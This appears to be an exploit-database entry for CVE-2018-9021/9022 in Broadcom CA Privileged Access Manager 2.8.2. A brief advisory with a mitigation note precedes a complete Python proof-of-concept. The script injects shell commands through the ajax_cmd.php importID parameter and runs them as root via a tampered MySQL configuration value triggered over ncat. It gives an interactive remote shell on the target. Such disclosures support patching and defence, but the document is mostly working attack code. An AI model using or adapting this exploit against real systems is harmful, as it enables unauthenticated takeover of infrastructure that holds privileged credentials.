Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution

vendor:

CA Privileged Access Manager

by:

Peter Lapp

8.8

CVSS

HIGH

Remote Command Execution

CWE

Product Name: CA Privileged Access Manager

Affected Version From: 2.8.2

Affected Version To: 2.8.2

Patch Exists: YES

Related CWE: CVE-2018-9021 and CVE-2018-9022

CPE: a:broadcom:ca_privileged_access_manager:2.8.2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: v2.8.2

2019

Broadcom CA Privilged Access Manager 2.8.2 – Remote Command Execution

A vulnerability in Broadcom CA Privileged Access Manager (PAM) 2.8.2 allows an unauthenticated attacker to execute arbitrary commands on the underlying operating system. This vulnerability is due to insufficient input validation of user-supplied data. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the underlying operating system.

Mitigation:

Upgrade to the latest version of Broadcom CA Privileged Access Manager (PAM) 2.8.2 or later.

Source

Exploit-DB raw data:

# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2

import urllib2
import urllib
import ssl
import sys
import json
import base64


ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE


def send_command(ip, cmd):
    cmd = urllib.quote_plus(cmd)
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']

def get_db_value():
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value
    
def encode_payload(cmd):
    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd
    
def restore_sql(value):
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)
    
def main():
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
	
    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()

    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'
	
    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        restore_sql(orig_value)
	


if __name__ == "__main__":
    main()